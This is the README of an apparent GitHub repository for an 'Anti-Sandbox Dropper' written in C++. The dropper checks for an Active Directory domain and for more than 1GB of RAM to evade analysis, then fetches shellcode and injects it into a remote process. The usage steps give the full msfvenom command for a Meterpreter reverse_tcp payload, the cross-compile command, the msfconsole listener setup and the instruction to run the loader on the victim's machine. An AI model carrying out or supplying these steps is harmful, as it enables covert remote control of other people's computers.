Skip to content

About

No description, website, or topics provided.

Resources

Stars

0 stars

Watchers

0 watching

Forks

Latest commit

 

History

1 Commit

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 

Repository files navigation

Anti-Sandbox Dropper

This is a dropper written in C++ that checks if:

  1. If the machine is part of an Active Directory domain.
  2. If the total physical RAM is higher than 1GB.

It will then do an outbound request to a specified IP (10.10.10.10 here), sleep for 100 seconds, before fetching a payload, and executing it in a remote process specified by its PID.

Usage

  1. Generate the shellcode using metasploit:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[YOUR_IP] LPORT=5555 -f raw -o index.raw
  1. Start an HTTP server, which will be used for downloading the shellcode we just generated.

  2. Update the loader source code. Elements that need to change are:

  • IP and port of your HTTP server.
  • Size of the shellcode.
  1. Compile the loader. The PID of the process being injected need to be specified. It could be the one of explorer.exe.
$ x86_64-w64-mingw32-g++ main.cpp -o run -lurlmon -lnetapi32 -lwinhttp -static -static-libgcc -static-libstdc++ -DPID=5844
  1. Set up your meterpreter listener:
$ msfconsole
$ set payload windows/x64/meterpreter/reverse_tcp
$ set LHOST [YOUR_IP]
$ set LPORT 5555
$ exploit
  1. Drop the loader on the victim's machine, and execute it.

About

No description, website, or topics provided.

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages